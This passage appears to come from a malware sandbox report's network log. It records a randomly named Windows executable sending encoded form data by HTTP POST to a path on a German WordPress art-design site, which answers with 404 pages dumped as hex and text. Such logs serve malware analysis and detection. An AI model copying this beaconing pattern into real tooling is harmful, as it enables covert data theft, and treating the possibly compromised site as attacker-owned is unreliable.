                                        Sep 3, 2024 13:55:46.366906881 CEST | 448 | IN | Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                                        Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                                        Sep 3, 2024 13:55:46.366918087 CEST | 1236 | IN | Data Raw: 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63
                                        Data Ascii: f3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(
                                        Sep 3, 2024 13:55:46.366935015 CEST | 1236 | IN | Data Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22
                                        Data Ascii: "undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObje
                                        Sep 3, 2024 13:55:46.366947889 CEST | 1236 | IN | Data Raw: 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63
                                        Data Ascii: :100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}</style><s
                                        Sep 3, 2024 13:55:46.366960049 CEST | 1236 | IN | Data Raw: 3d 36 2e 36 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 68 65 61 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 68 31 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c
                                        Data Ascii: =6.6.1' media='all' /><style id='wp-block-heading-inline-css'>h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:wher
                                        Sep 3, 2024 13:55:46.366971970 CEST | 1236 | IN | Data Raw: 29 3b 0a 09 09 09 09 09 63 6c 69 70 2d 70 61 74 68 3a 20 70 61 74 68 28 27 4d 31 31 2e 39 33 2e 36 38 34 76 38 2e 30 33 39 6c 35 2e 36 33 33 2d 35 2e 36 33 33 20 31 2e 32 31 36 20 31 2e 32 33 2d 35 2e 36 36 20 35 2e 36 36 68 38 2e 30 34 76 31 2e
                                        Data Ascii: );clip-path: path('M11.93.684v8.039l5.633-5.633 1.216 1.23-5.66 5.66h8.04v1.737H13.2l5.701 5.701-1.23 1.23-5.742-5.742V21h-1.737v-8.094l-5.77 5.77-1.23-1.217 5.743-5.742H.842V9.98h8.162l-5.701-5.7 1.23-1.231 5.66 5.66V.684h1.737Z');
                                        Sep 3, 2024 13:55:46.366983891 CEST | 1236 | IN | Data Raw: 61 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e
                                        Data Ascii: ap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writi
                                        Sep 3, 2024 13:55:46.366998911 CEST | 1236 | IN | Data Raw: 61 70 70 65 72 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 77 69 64 74 68 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65
                                        Data Ascii: apper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidd
                                        Sep 3, 2024 13:55:46.371840954 CEST | 1236 | IN | Data Raw: 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 29 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f
                                        Data Ascii: e(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-bloc


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        34 | 192.168.2.4 | 49771 | 162.55.254.209 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:48.235692978 CEST | 775 | OUT | POST /qpwk/ HTTP/1.1
                                        Host: www.anaidittrich.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.anaidittrich.com
                                        Referer: http://www.anaidittrich.com/qpwk/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 71 52 4d 73 54 4d 61 76 6e 43 34 36 65 68 43 32 7a 2f 4e 33 34 4c 44 36 50 4b 54 5a 31 58 71 56 6b 3d
                                        Data Ascii: r8=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQlqRMsTMavnC46ehC2z/N34LD6PKTZ1XqVk=
                                        Sep 3, 2024 13:55:48.917521000 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:55:48 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                                        Upgrade: h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                                        Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                                        Sep 3, 2024 13:55:48.917538881 CEST | 1236 | IN | Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                                        Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                                        Sep 3, 2024 13:55:48.917551041 CEST | 1236 | IN | Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                                        Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                                        Sep 3, 2024 13:55:48.917598963 CEST | 1236 | IN | Data Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                                        Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                                        Sep 3, 2024 13:55:48.917610884 CEST | 1236 | IN | Data Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
                                        Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
                                        Sep 3, 2024 13:55:48.917622089 CEST | 1236 | IN | Data Raw: 72 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 7d 2e 6c 69 6e 6b 2d 75 69 2d 62 6c 6f 63 6b 2d 69 6e 73 65 72 74 65 72 5f 5f 62 61 63 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
                                        Data Ascii: rter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}.is-style-arrow-link .wp-block-navigation-item__label:after {content: "\2197";padding-inline-start: 0.25rem;vertical-align: mid
                                        Sep 3, 2024 13:55:48.917634964 CEST | 776 | IN | Data Raw: 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74
                                        Data Ascii: lign-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-
                                        Sep 3, 2024 13:55:48.917654037 CEST1236INData Raw: 6f 69 64 20 75 73 69 6e 67 20 65 6d 70 74 79 20 68 65 61 64 69 6e 67 73 20 74 6f 20 64 69 73 70 6c 61 79 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 6f 6e 6c 79 2c 20 77 68 69 63 68 20 69 73 20 61 6e 20 41 31 31 59 20 69 73 73 75 65 20 2a 2f 0a 09
                                        Data Ascii: oid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;}.is-style-asterisk:-moz-only-whitespace:before {content: none;}.is-style-ast
                                        Sep 3, 2024 13:55:48.917665958 CEST1236INData Raw: 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74
                                        Data Ascii: .wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:w
                                        Sep 3, 2024 13:55:48.917680025 CEST1236INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f
                                        Data Ascii: .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;ma
                                        Sep 3, 2024 13:55:48.922507048 CEST1236INData Raw: 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f
                                        Data Ascii: d='wp-block-columns-inline-css'>.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        35 | 192.168.2.4 | 49772 | 162.55.254.209 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:50.925137043 CEST | 10857 | OUT | POST /qpwk/ HTTP/1.1
                                        Host: www.anaidittrich.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.anaidittrich.com
                                        Referer: http://www.anaidittrich.com/qpwk/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 51 49 2b 48 6c 32 72 49 37 69 71 42 4f 4c 47 30 37 6a 63 4f 57 7a 51 52 45 63 6b 47 4a 36 62 41 38 35 78 77 67 68 65 76 65 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2b 36 71 72 53 6f 4a 79 51 4b 31 32 4c 74 49 49 6f 51 71 48 56 6f 42 70 53 79 58 63 2b 6f 50 52 66 71 44 34 30 39 6b 79 38 36 4c 4f 43 58 52 68 57 57 77 33 56 69 75 69 62 50 59 77 54 6b 36 4e 43 4e 30 30 73 49 48 5a 56 69 56 38 30 2b 34 31 5a 37 70 37 [TRUNCATED]
                                        Data Ascii: r8= [TRUNCATED]
                                        Sep 3, 2024 13:55:51.697757959 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:55:51 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                                        Upgrade: h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                                        Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                                        Sep 3, 2024 13:55:51.697773933 CEST | 1236 | IN | Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                                        Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                                        Sep 3, 2024 13:55:51.697783947 CEST | 1236 | IN | Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                                        Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                                        Sep 3, 2024 13:55:51.697794914 CEST | 1236 | IN | Data Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                                        Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                                        Sep 3, 2024 13:55:51.697808027 CEST | 896 | IN | Data Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
                                        Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
                                        Sep 3, 2024 13:55:51.697818995 CEST | 1236 | IN | Data Raw: 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2d 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63
                                        Data Ascii: -block-group-is-layout-constrained){position:relative}</style><style id='wp-block-navigation-link-inline-css'>.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__des
                                        Sep 3, 2024 13:55:51.697829962 CEST | 1236 | IN | Data Raw: 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77
                                        Data Ascii: ng-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=ver
                                        Sep 3, 2024 13:55:51.697839975 CEST | 1236 | IN | Data Raw: 09 09 09 09 63 6f 6e 74 65 6e 74 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 3a 2d 6d 6f 7a 2d 6f 6e 6c 79 2d 77 68 69 74 65 73 70 61 63 65 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09
                                        Data Ascii: content: none;}.is-style-asterisk:-moz-only-whitespace:before {content: none;}.is-style-asterisk.has-text-align-center:before {margin: 0 auto;}.is-style-asterisk.has-text-align-right:before {
